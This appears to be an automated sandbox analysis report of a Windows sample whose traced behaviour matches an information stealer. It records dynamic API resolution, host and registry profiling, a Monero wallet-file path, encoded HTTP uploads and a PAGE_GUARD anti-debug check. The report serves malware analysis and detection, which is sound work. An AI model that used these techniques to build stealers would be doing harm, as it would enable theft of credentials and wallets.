14310->14312 14313 101a740 lstrcpy 14311->14313 14314 1015da7 14312->14314 14313->14314 14314->13378 14316 101a7a0 lstrcpy 14315->14316 14317 1004899 14316->14317 15369 10047b0 14317->15369 14319 10048a5 14320 101a740 lstrcpy 14319->14320 14321 10048d7 14320->14321 14322 101a740 lstrcpy 14321->14322 14323 10048e4 14322->14323 14324 101a740 lstrcpy 14323->14324 14325 10048f1 14324->14325 14326 101a740 lstrcpy 14325->14326 14327 10048fe 14326->14327 14328 101a740 lstrcpy 14327->14328 14329 100490b InternetOpenA StrCmpCA 14328->14329 14330 1004944 14329->14330 14331 1004ecb InternetCloseHandle 
14330->14331 15375 1018b60 14330->15375 14333 1004ee8 14331->14333 15390 1009ac0 CryptStringToBinaryA 14333->15390 14334 1004963 15383 101a920 14334->15383 14337 1004976 14339 101a8a0 lstrcpy 14337->14339 14344 100497f 14339->14344 14340 101a820 2 API calls 14341 1004f05 14340->14341 14343 101a9b0 4 API calls 14341->14343 14342 1004f27 ctype 14346 101a7a0 lstrcpy 14342->14346 14345 1004f1b 14343->14345 14348 101a9b0 4 API calls 14344->14348 14347 101a8a0 lstrcpy 14345->14347 14359 1004f57 14346->14359 14347->14342 14349 10049a9 14348->14349 14350 101a8a0 lstrcpy 14349->14350 14351 10049b2 14350->14351 14352 101a9b0 4 API calls 14351->14352 14353 10049d1 14352->14353 14354 101a8a0 lstrcpy 14353->14354 14355 10049da 14354->14355 14356 101a920 3 API calls 14355->14356 14357 10049f8 14356->14357 14358 101a8a0 lstrcpy 14357->14358 14360 1004a01 14358->14360 14359->13381 14361 101a9b0 4 API calls 14360->14361 14362 1004a20 14361->14362 14363 101a8a0 lstrcpy 14362->14363 14364 1004a29 14363->14364 14365 101a9b0 4 API calls 14364->14365 14366 1004a48 14365->14366 14367 101a8a0 lstrcpy 14366->14367 14368 1004a51 14367->14368 14369 101a9b0 4 API calls 14368->14369 14370 1004a7d 14369->14370 14371 101a920 3 API calls 14370->14371 14372 1004a84 14371->14372 14373 101a8a0 lstrcpy 14372->14373 14374 1004a8d 14373->14374 14375 1004aa3 InternetConnectA 14374->14375 14375->14331 14376 1004ad3 HttpOpenRequestA 14375->14376 14378 1004b28 14376->14378 14379 1004ebe InternetCloseHandle 14376->14379 14380 101a9b0 4 API calls 14378->14380 14379->14331 14381 1004b3c 14380->14381 14382 101a8a0 lstrcpy 14381->14382 14383 1004b45 14382->14383 14384 101a920 3 API calls 14383->14384 14385 1004b63 14384->14385 14386 101a8a0 lstrcpy 14385->14386 14387 1004b6c 14386->14387 14388 101a9b0 4 API calls 14387->14388 14389 1004b8b 14388->14389 14390 101a8a0 lstrcpy 14389->14390 14391 1004b94 14390->14391 14392 101a9b0 4 API calls 14391->14392 14393 1004bb5 14392->14393 14394 101a8a0 lstrcpy 
14393->14394 14395 1004bbe 14394->14395 14396 101a9b0 4 API calls 14395->14396 14397 1004bde 14396->14397 14398 101a8a0 lstrcpy 14397->14398 14399 1004be7 14398->14399 14400 101a9b0 4 API calls 14399->14400 14401 1004c06 14400->14401 14402 101a8a0 lstrcpy 14401->14402 14403 1004c0f 14402->14403 14404 101a920 3 API calls 14403->14404 14405 1004c2d 14404->14405 14406 101a8a0 lstrcpy 14405->14406 14407 1004c36 14406->14407 14408 101a9b0 4 API calls 14407->14408 14409 1004c55 14408->14409 14410 101a8a0 lstrcpy 14409->14410 14411 1004c5e 14410->14411 14412 101a9b0 4 API calls 14411->14412 14413 1004c7d 14412->14413 14414 101a8a0 lstrcpy 14413->14414 14415 1004c86 14414->14415 14416 101a920 3 API calls 14415->14416 14417 1004ca4 14416->14417 14418 101a8a0 lstrcpy 14417->14418 14419 1004cad 14418->14419 14420 101a9b0 4 API calls 14419->14420 14421 1004ccc 14420->14421 14422 101a8a0 lstrcpy 14421->14422 14423 1004cd5 14422->14423 14424 101a9b0 4 API calls 14423->14424 14425 1004cf6 14424->14425 14426 101a8a0 lstrcpy 14425->14426 14427 1004cff 14426->14427 14428 101a9b0 4 API calls 14427->14428 14429 1004d1f 14428->14429 14430 101a8a0 lstrcpy 14429->14430 14431 1004d28 14430->14431 14432 101a9b0 4 API calls 14431->14432 14433 1004d47 14432->14433 14434 101a8a0 lstrcpy 14433->14434 14435 1004d50 14434->14435 14436 101a920 3 API calls 14435->14436 14437 1004d6e 14436->14437 14438 101a8a0 lstrcpy 14437->14438 14439 1004d77 14438->14439 14440 101a740 lstrcpy 14439->14440 14441 1004d92 14440->14441 14442 101a920 3 API calls 14441->14442 14443 1004db3 14442->14443 14444 101a920 3 API calls 14443->14444 14445 1004dba 14444->14445 14446 101a8a0 lstrcpy 14445->14446 14447 1004dc6 14446->14447 14448 1004de7 lstrlen 14447->14448 14449 1004dfa 14448->14449 14450 1004e03 lstrlen 14449->14450 15389 101aad0 14450->15389 14452 1004e13 HttpSendRequestA 14453 1004e32 InternetReadFile 14452->14453 14454 1004e67 InternetCloseHandle 14453->14454 14459 1004e5e 14453->14459 14456 101a800 
Control-flow graph edge list (rendered on the page as an interactive graph; only the API calls visible in the node labels are kept here, grouped by the function they belong to):
• 1005979-100604f: builds request strings with the lstrcpy/lstrlen/lstrcat helpers (101a740, 101a7a0, 101a820, 101a8a0, 101a920, 101a9b0), calls InternetOpenA and StrCmpCA, fetches a timestamp via 1018b60 (GetSystemTime), then InternetConnectA (1005b7c), HttpOpenRequestA (1005bac), lstrlen, GetProcessHeap/RtlAllocateHeap, HttpSendRequestA (1005f2a) and an InternetReadFile loop (1005f35) that appends each chunk to a string buffer; three InternetCloseHandle calls on exit. The accumulated response is passed to 1009ac0, whose body at 1009af9 calls LocalAlloc, CryptStringToBinaryA and LocalFree.
• 1005100-1005913 (reached via 1015190 and 1001590): same WinINet chain (InternetOpenA, StrCmpCA, 1018b60 GetSystemTime, InternetConnectA, HttpOpenRequestA) after first passing two buffers through 1018ea0 (CryptBinaryToStringA, GetProcessHeap/RtlAllocateHeap, CryptBinaryToStringA) and the URL through 10047b0 (lstrlen, InternetCrackUrlA).
• 1005009-10050ec: InternetOpenUrlA, InternetReadFile loop, InternetCloseHandle twice.
• 10117c4-10119c2: a chain of StrCmpCA comparisons (10117c4, 101185d, 101187f, 10118ad, 10118cf, 10118f1, 1011913, 1011932, 1011951, 1011970); one branch of the first comparison leads straight to ExitProcess (10117cf).
• 1010db7-1010f17, 1010f67-1011044 and 1010759-1010a49: further StrCmpCA comparison chains with lstrlen/lstrcpy string handling; 1010759 also calls 100fb00, 1010030 and 1010250 (the latter via 1018de0).
• 1011a26-1012699: a long straight-line function that gathers host information, appending each result to one string with 101a9b0/101a8a0. Helpers seen: 1017690 and 1017720 (GetProcessHeap/RtlAllocateHeap, RegOpenKeyExA, RegQueryValueExA, RegCloseKey); 10177c0 (GetCurrentProcess, IsWow64Process); 1017500, 1017850 and 10178e0 (unresolved, 6 and 3 API calls); 1017980 (GetLocalTime, wsprintfA); 1017a30 (GetTimeZoneInformation, wsprintfA); 1017b00 (GetUserDefaultLocaleName, then 1018d20 with LocalAlloc and CharToOemW); 1017b90 (GetKeyboardLayoutList, LocalAlloc, GetLocaleInfoA loop, LocalFree); 1017d80 (GetSystemPowerStatus); GetCurrentProcessId followed by 1019470 (OpenProcess, GetModuleFileNameExA, CloseHandle); 1017e00 (RegOpenKeyExA, RegQueryValueExA, RegCloseKey); 1017f60 (GetLogicalProcessorInformationEx, GetLastError, wsprintfA, heap alloc/free via 1018a10 and 10189f0); 1017ed0 (GetSystemInfo, wsprintfA); 1018100 (GlobalMemoryStatusEx, __aulldiv, wsprintfA); 10187c0 (GetProcessHeap/RtlAllocateHeap, wsprintfA); 10181f0 (string helpers only); 1018320, called twice (RegOpenKeyExA, RegEnumKeyExA loop, wsprintfA, RegQueryValueExA, lstrlen, RegCloseKey); 1018680 (CreateToolhelp32Snapshot, Process32First, Process32Next loop, CloseHandle). The finished string is handed to 1015190, which leads into the 1005100 request above.
• 1006d40 (reached via 10098d0, 1009880 and 1006fb0): 1006660 allocates with VirtualAlloc (two calls), 10069b0 resolves imports in a loop of LoadLibraryA (1006a09) and GetProcAddress (1006ba8) with heap allocation/free via 1018a10 (GetProcessHeap, RtlAllocateHeap) and 10189f0 (GetProcessHeap, HeapFree); cleanup calls VirtualFree (1006ee6) and FreeLibrary (1006f26).

                        Control-flow Graph

                        APIs
                        • GetProcAddress.KERNEL32(74DD0000,018924E8), ref: 010198A1
                        • GetProcAddress.KERNEL32(74DD0000,018922A8), ref: 010198BA
                        • GetProcAddress.KERNEL32(74DD0000,01892308), ref: 010198D2
                        • GetProcAddress.KERNEL32(74DD0000,018923F8), ref: 010198EA
                        • GetProcAddress.KERNEL32(74DD0000,018923B0), ref: 01019903
                        • GetProcAddress.KERNEL32(74DD0000,018992B8), ref: 0101991B
                        • GetProcAddress.KERNEL32(74DD0000,018857D0), ref: 01019933
                        • GetProcAddress.KERNEL32(74DD0000,01885770), ref: 0101994C
                        • GetProcAddress.KERNEL32(74DD0000,018923C8), ref: 01019964
                        • GetProcAddress.KERNEL32(74DD0000,018922C0), ref: 0101997C
                        • GetProcAddress.KERNEL32(74DD0000,018923E0), ref: 01019995
                        • GetProcAddress.KERNEL32(74DD0000,01892398), ref: 010199AD
                        • GetProcAddress.KERNEL32(74DD0000,01885A10), ref: 010199C5
                        • GetProcAddress.KERNEL32(74DD0000,018924A0), ref: 010199DE
                        • GetProcAddress.KERNEL32(74DD0000,01892278), ref: 010199F6
                        • GetProcAddress.KERNEL32(74DD0000,01885910), ref: 01019A0E
                        • GetProcAddress.KERNEL32(74DD0000,01892410), ref: 01019A27
                        • GetProcAddress.KERNEL32(74DD0000,01892428), ref: 01019A3F
                        • GetProcAddress.KERNEL32(74DD0000,01885730), ref: 01019A57
                        • GetProcAddress.KERNEL32(74DD0000,01892290), ref: 01019A70
                        • GetProcAddress.KERNEL32(74DD0000,01885890), ref: 01019A88
                        • LoadLibraryA.KERNEL32(01892458,?,01016A00), ref: 01019A9A
                        • LoadLibraryA.KERNEL32(01892320,?,01016A00), ref: 01019AAB
                        • LoadLibraryA.KERNEL32(01892338,?,01016A00), ref: 01019ABD
                        • LoadLibraryA.KERNEL32(01892488,?,01016A00), ref: 01019ACF
                        • LoadLibraryA.KERNEL32(01892248,?,01016A00), ref: 01019AE0
                        • GetProcAddress.KERNEL32(75A70000,01892350), ref: 01019B02
                        • GetProcAddress.KERNEL32(75290000,018924D0), ref: 01019B23
                        • GetProcAddress.KERNEL32(75290000,01892380), ref: 01019B3B
                        • GetProcAddress.KERNEL32(75BD0000,01892218), ref: 01019B5D
                        • GetProcAddress.KERNEL32(75450000,01885750), ref: 01019B7E
                        • GetProcAddress.KERNEL32(76E90000,018991D8), ref: 01019B9F
                        • GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 01019BB6
                        Strings
                        • NtQueryInformationProcess, xrefs: 01019BAA
                        Memory Dump Source
                        • Source File: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: AddressProc$LibraryLoad
                        • String ID: NtQueryInformationProcess
                        • API String ID: 2238633743-2781105232
                        • Opcode ID: 9a423691fb2a459f33f20ed36df30179c7715ce704573332749b05efd9e7e66a
                        • Instruction ID: 5658958373001c44b38bf761902d4a66f381f86f9c96149def5b08813f33c1b6
                        • Opcode Fuzzy Hash: 9a423691fb2a459f33f20ed36df30179c7715ce704573332749b05efd9e7e66a
                        • Instruction Fuzzy Hash: 25A11ABE5C52409FE378EFA8F99CA6A3BF9F788301704451AE60BC724CD6399441DB50

                        Control-flow Graph

                        Control-flow graph (rendered on the page as an interactive graph with executed/not-executed colouring; edge list summarised): four basic blocks. 10045c0-1004695 calls RtlAllocateHeap and falls into a loop header at 10046a0-10046a6; the loop body 10046ac-100474a returns to the header; the loop exits into 100474f-10047a9, which calls VirtualProtect. Read in prototype order, the VirtualProtect arguments below are a 4-byte region with flNewProtect 0x100, which is PAGE_GUARD. The decoy string listed under Strings is referenced from the first, third and fourth blocks.
                        APIs
                        • RtlAllocateHeap.NTDLL(00000000), ref: 0100460F
                        • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 0100479C
                        Strings
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 010046CD, 01004729, 01004617, 01004734, 01004770, 0100475A, 010045D2, 0100466D, 010045E8, 010045F3, 01004683, 01004678, 01004643, 010045C7, 010045DD, 010046D8, 0100477B, 01004662, 0100462D, 010046AC, 0100471E, 0100474F, 01004765, 01004713, 0100473F, 01004622, 01004657, 01004638, 010046C2, 010046B7
                        Memory Dump Source
                        • Source File: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: AllocateHeapProtectVirtual
                        • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom. (the same string, $-separated, once per xref listed under Strings)
                        • API String ID: 1542196881-2218711628
                        • Opcode ID: 2ba3fa57ee18da293cdc33cc042ffbc6f1b97aaf3c636d500aefae2addb85f72
                        • Instruction ID: 30a458fc0bc76bdf92281af5cf974990594f8046fc6912444d62a62e791bab14
                        • Opcode Fuzzy Hash: 2ba3fa57ee18da293cdc33cc042ffbc6f1b97aaf3c636d500aefae2addb85f72
                        • Instruction Fuzzy Hash: 5C41DA707C67346B8738BFA59CCEADE76765F46624F50504CEB405E380CAB06500CD2E

                        Control-flow Graph

                        • Graph rendered as a graphic in the original report (legend: Executed / Not Executed); basic blocks 1004880-1004fa2, with calls to subfunctions 101a7a0, 10047b0, 101a740, 1018b60, 101a920, 101a8a0, 101a800, 101a9b0, 101aad0, 1009ac0, 1018990, 101a820 and to InternetOpenA, StrCmpCA, InternetConnectA, HttpOpenRequestA, lstrlen, HttpSendRequestA, InternetReadFile, InternetCloseHandle.
                        APIs
                          • Part of subcall function 0101A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0101A7E6
                          • Part of subcall function 010047B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 01004839
                          • Part of subcall function 010047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 01004849
                          • Part of subcall function 0101A740: lstrcpy.KERNEL32(01020E17,00000000), ref: 0101A788
                        • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 01004915
                        • StrCmpCA.SHLWAPI(?,0189EAC8), ref: 0100493A
                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 01004ABA
                        • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,01020DDB,00000000,?,?,00000000,?,",00000000,?,0189E998), ref: 01004DE8
                        • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 01004E04
                        • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 01004E18
                        • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 01004E49
                        • InternetCloseHandle.WININET(00000000), ref: 01004EAD
                        • InternetCloseHandle.WININET(00000000), ref: 01004EC5
                        • HttpOpenRequestA.WININET(00000000,0189EA48,?,0189E020,00000000,00000000,00400100,00000000), ref: 01004B15
                          • Part of subcall function 0101A9B0: lstrlen.KERNEL32(?,01899068,?,\Monero\wallet.keys,01020E17), ref: 0101A9C5
                          • Part of subcall function 0101A9B0: lstrcpy.KERNEL32(00000000), ref: 0101AA04
                          • Part of subcall function 0101A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0101AA12
                          • Part of subcall function 0101A8A0: lstrcpy.KERNEL32(?,01020E17), ref: 0101A905
                          • Part of subcall function 0101A920: lstrcpy.KERNEL32(00000000,?), ref: 0101A972
                          • Part of subcall function 0101A920: lstrcat.KERNEL32(00000000), ref: 0101A982
                        • InternetCloseHandle.WININET(00000000), ref: 01004ECF
                        Strings
                        Yara matches
                        Similarity
                        • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                        • String ID: "$"$------$------$------
                        • API String ID: 460715078-2180234286
                        • Opcode ID: 586ec6a5dee9972e067c9a9b8feb389ad5849d5eabc64eef151188ecf3af525a
                        • Instruction ID: c54f1d55e5ad2456f9cd0afdce0d402fbf447548a8d12aff90752b5ec69d3a56
                        • Opcode Fuzzy Hash: 586ec6a5dee9972e067c9a9b8feb389ad5849d5eabc64eef151188ecf3af525a
                        • Instruction Fuzzy Hash: 67123C72A12159EADB15EB90DD90FEEB339BF24210F504199E54663094EF342F8ACF60
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,010011B7), ref: 01017880
                        • RtlAllocateHeap.NTDLL(00000000), ref: 01017887
                        • GetUserNameA.ADVAPI32(00000104,00000104), ref: 0101789F
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateNameProcessUser
                        • String ID:
                        • API String ID: 1296208442-0
                        • Opcode ID: b962a07a4b34884c8a1e9f358ddbb965f7580308d8580313bc260be9af2c5bea
                        • Instruction ID: 8d7e40589b03863ab0aa2a6ac734e4c138d65d9a516581509c574bc702043ce1
                        • Opcode Fuzzy Hash: b962a07a4b34884c8a1e9f358ddbb965f7580308d8580313bc260be9af2c5bea
                        • Instruction Fuzzy Hash: 15F04FB5984208EBD714DF99D949BAEBBB8FB04711F10025AFA06A3684C77815048BA1
                        APIs
                        Yara matches
                        Similarity
                        • API ID: ExitInfoProcessSystem
                        • String ID:
                        • API String ID: 752954902-0
                        • Opcode ID: c853c6aa83039a919c81aa2a35cd3db17cc0e28d33498657d9365f25001945a8
                        • Instruction ID: 8fe325556ffe2037edbf470fa8b5ff1fe73a8db2323a5ca16e3d7e6f32afebf7
                        • Opcode Fuzzy Hash: c853c6aa83039a919c81aa2a35cd3db17cc0e28d33498657d9365f25001945a8
                        • Instruction Fuzzy Hash: 76D05E7894030CDBDB28DFE0E84D6DDBB78FB08311F000554E90763340EA30A481CBA5

                        Control-flow Graph

                        APIs
                        • GetProcAddress.KERNEL32(74DD0000,01885870), ref: 01019C2D
                        • GetProcAddress.KERNEL32(74DD0000,018858B0), ref: 01019C45
                        • GetProcAddress.KERNEL32(74DD0000,01899628), ref: 01019C5E
                        • GetProcAddress.KERNEL32(74DD0000,01899640), ref: 01019C76
                        • GetProcAddress.KERNEL32(74DD0000,01899670), ref: 01019C8E
                        • GetProcAddress.KERNEL32(74DD0000,018996A0), ref: 01019CA7
                        • GetProcAddress.KERNEL32(74DD0000,0188BCC0), ref: 01019CBF
                        • GetProcAddress.KERNEL32(74DD0000,0189D1A0), ref: 01019CD7
                        • GetProcAddress.KERNEL32(74DD0000,0189D290), ref: 01019CF0
                        • GetProcAddress.KERNEL32(74DD0000,0189D3B0), ref: 01019D08
                        • GetProcAddress.KERNEL32(74DD0000,0189D230), ref: 01019D20
                        • GetProcAddress.KERNEL32(74DD0000,01885A90), ref: 01019D39
                        • GetProcAddress.KERNEL32(74DD0000,01885930), ref: 01019D51
                        • GetProcAddress.KERNEL32(74DD0000,01885A50), ref: 01019D69
                        • GetProcAddress.KERNEL32(74DD0000,01885970), ref: 01019D82
                        • GetProcAddress.KERNEL32(74DD0000,0189D1E8), ref: 01019D9A
                        • GetProcAddress.KERNEL32(74DD0000,0189D278), ref: 01019DB2
                        • GetProcAddress.KERNEL32(74DD0000,0188BD10), ref: 01019DCB
                        • GetProcAddress.KERNEL32(74DD0000,018859B0), ref: 01019DE3
                        • GetProcAddress.KERNEL32(74DD0000,0189D2D8), ref: 01019DFB
                        • GetProcAddress.KERNEL32(74DD0000,0189D218), ref: 01019E14
                        • GetProcAddress.KERNEL32(74DD0000,0189D128), ref: 01019E2C
                        • GetProcAddress.KERNEL32(74DD0000,0189D1B8), ref: 01019E44
                        • GetProcAddress.KERNEL32(74DD0000,018859D0), ref: 01019E5D
                        • GetProcAddress.KERNEL32(74DD0000,0189D110), ref: 01019E75
                        • GetProcAddress.KERNEL32(74DD0000,0189D2F0), ref: 01019E8D
                        • GetProcAddress.KERNEL32(74DD0000,0189D3E0), ref: 01019EA6
                        • GetProcAddress.KERNEL32(74DD0000,0189D158), ref: 01019EBE
                        • GetProcAddress.KERNEL32(74DD0000,0189D350), ref: 01019ED6
                        • GetProcAddress.KERNEL32(74DD0000,0189D3C8), ref: 01019EEF
                        • GetProcAddress.KERNEL32(74DD0000,0189D0F8), ref: 01019F07
                        • GetProcAddress.KERNEL32(74DD0000,0189D380), ref: 01019F1F
                        • GetProcAddress.KERNEL32(74DD0000,0189D248), ref: 01019F38
                        • GetProcAddress.KERNEL32(74DD0000,0189A240), ref: 01019F50
                        • GetProcAddress.KERNEL32(74DD0000,0189D1D0), ref: 01019F68
                        • GetProcAddress.KERNEL32(74DD0000,0189D140), ref: 01019F81
                        • GetProcAddress.KERNEL32(74DD0000,018859F0), ref: 01019F99
                        • GetProcAddress.KERNEL32(74DD0000,0189D320), ref: 01019FB1
                        • GetProcAddress.KERNEL32(74DD0000,01885A70), ref: 01019FCA
                        • GetProcAddress.KERNEL32(74DD0000,0189D308), ref: 01019FE2
                        • GetProcAddress.KERNEL32(74DD0000,0189D260), ref: 01019FFA
                        • GetProcAddress.KERNEL32(74DD0000,018856B0), ref: 0101A013
                        • GetProcAddress.KERNEL32(74DD0000,01885B10), ref: 0101A02B
                        • LoadLibraryA.KERNEL32(0189D368,?,01015CA3,01020AEB,?,?,?,?,?,?,?,?,?,?,01020AEA,01020AE3), ref: 0101A03D
                        • LoadLibraryA.KERNEL32(0189D200,?,01015CA3,01020AEB,?,?,?,?,?,?,?,?,?,?,01020AEA,01020AE3), ref: 0101A04E
                        • LoadLibraryA.KERNEL32(0189D338,?,01015CA3,01020AEB,?,?,?,?,?,?,?,?,?,?,01020AEA,01020AE3), ref: 0101A060
                        • LoadLibraryA.KERNEL32(0189D170,?,01015CA3,01020AEB,?,?,?,?,?,?,?,?,?,?,01020AEA,01020AE3), ref: 0101A072
                        • LoadLibraryA.KERNEL32(0189D398,?,01015CA3,01020AEB,?,?,?,?,?,?,?,?,?,?,01020AEA,01020AE3), ref: 0101A083
                        • LoadLibraryA.KERNEL32(0189D188,?,01015CA3,01020AEB,?,?,?,?,?,?,?,?,?,?,01020AEA,01020AE3), ref: 0101A095
                        • LoadLibraryA.KERNEL32(0189D2A8,?,01015CA3,01020AEB,?,?,?,?,?,?,?,?,?,?,01020AEA,01020AE3), ref: 0101A0A7
                        • LoadLibraryA.KERNEL32(0189D2C0,?,01015CA3,01020AEB,?,?,?,?,?,?,?,?,?,?,01020AEA,01020AE3), ref: 0101A0B8
                        • GetProcAddress.KERNEL32(75290000,01885C70), ref: 0101A0DA
                        • GetProcAddress.KERNEL32(75290000,0189D4B8), ref: 0101A0F2
                        • GetProcAddress.KERNEL32(75290000,01899118), ref: 0101A10A
                        • GetProcAddress.KERNEL32(75290000,0189D578), ref: 0101A123
                        • GetProcAddress.KERNEL32(75290000,01885CB0), ref: 0101A13B
                        • GetProcAddress.KERNEL32(73440000,0188B9A0), ref: 0101A160
                        • GetProcAddress.KERNEL32(73440000,01885D70), ref: 0101A179
                        • GetProcAddress.KERNEL32(73440000,0188BA68), ref: 0101A191
                        • GetProcAddress.KERNEL32(73440000,0189D4D0), ref: 0101A1A9
                        • GetProcAddress.KERNEL32(73440000,0189D4E8), ref: 0101A1C2
                        • GetProcAddress.KERNEL32(73440000,01885D90), ref: 0101A1DA
                        • GetProcAddress.KERNEL32(73440000,01885C90), ref: 0101A1F2
                        • GetProcAddress.KERNEL32(73440000,0189D548), ref: 0101A20B
                        • GetProcAddress.KERNEL32(752C0000,01885AB0), ref: 0101A22C
                        • GetProcAddress.KERNEL32(752C0000,01885C50), ref: 0101A244
                        • GetProcAddress.KERNEL32(752C0000,0189D3F8), ref: 0101A25D
                        • GetProcAddress.KERNEL32(752C0000,0189D488), ref: 0101A275
                        • GetProcAddress.KERNEL32(752C0000,01885BB0), ref: 0101A28D
                        • GetProcAddress.KERNEL32(74EC0000,0188B630), ref: 0101A2B3
                        • GetProcAddress.KERNEL32(74EC0000,0188B838), ref: 0101A2CB
                        • GetProcAddress.KERNEL32(74EC0000,0189D560), ref: 0101A2E3
                        • GetProcAddress.KERNEL32(74EC0000,01885E10), ref: 0101A2FC
                        • GetProcAddress.KERNEL32(74EC0000,01885B30), ref: 0101A314
                        • GetProcAddress.KERNEL32(74EC0000,0188BAB8), ref: 0101A32C
                        • GetProcAddress.KERNEL32(75BD0000,0189D470), ref: 0101A352
                        • GetProcAddress.KERNEL32(75BD0000,01885D50), ref: 0101A36A
                        • GetProcAddress.KERNEL32(75BD0000,01899248), ref: 0101A382
                        • GetProcAddress.KERNEL32(75BD0000,0189D440), ref: 0101A39B
                        • GetProcAddress.KERNEL32(75BD0000,0189D518), ref: 0101A3B3
                        • GetProcAddress.KERNEL32(75BD0000,01885DB0), ref: 0101A3CB
                        • GetProcAddress.KERNEL32(75BD0000,01885DF0), ref: 0101A3E4
                        • GetProcAddress.KERNEL32(75BD0000,0189D4A0), ref: 0101A3FC
                        • GetProcAddress.KERNEL32(75BD0000,0189D500), ref: 0101A414
                        • GetProcAddress.KERNEL32(75A70000,01885DD0), ref: 0101A436
                        • GetProcAddress.KERNEL32(75A70000,0189D410), ref: 0101A44E
                        • GetProcAddress.KERNEL32(75A70000,0189D530), ref: 0101A466
                        • GetProcAddress.KERNEL32(75A70000,0189D590), ref: 0101A47F
                        • GetProcAddress.KERNEL32(75A70000,0189D5A8), ref: 0101A497
                        • GetProcAddress.KERNEL32(75450000,01885D10), ref: 0101A4B8
                        • GetProcAddress.KERNEL32(75450000,01885C10), ref: 0101A4D1
                        • GetProcAddress.KERNEL32(75DA0000,01885AD0), ref: 0101A4F2
                        • GetProcAddress.KERNEL32(75DA0000,0189D428), ref: 0101A50A
                        • GetProcAddress.KERNEL32(6F070000,01885B90), ref: 0101A530
                        • GetProcAddress.KERNEL32(6F070000,01885E30), ref: 0101A548
                        • GetProcAddress.KERNEL32(6F070000,01885BF0), ref: 0101A560
                        • GetProcAddress.KERNEL32(6F070000,0189D458), ref: 0101A579
                        • GetProcAddress.KERNEL32(6F070000,01885CD0), ref: 0101A591
                        • GetProcAddress.KERNEL32(6F070000,01885AF0), ref: 0101A5A9
                        • GetProcAddress.KERNEL32(6F070000,01885CF0), ref: 0101A5C2
                        • GetProcAddress.KERNEL32(6F070000,01885C30), ref: 0101A5DA
                        • GetProcAddress.KERNEL32(6F070000,InternetSetOptionA), ref: 0101A5F1
                        • GetProcAddress.KERNEL32(6F070000,HttpQueryInfoA), ref: 0101A607
                        • GetProcAddress.KERNEL32(75AF0000,0189CF90), ref: 0101A629
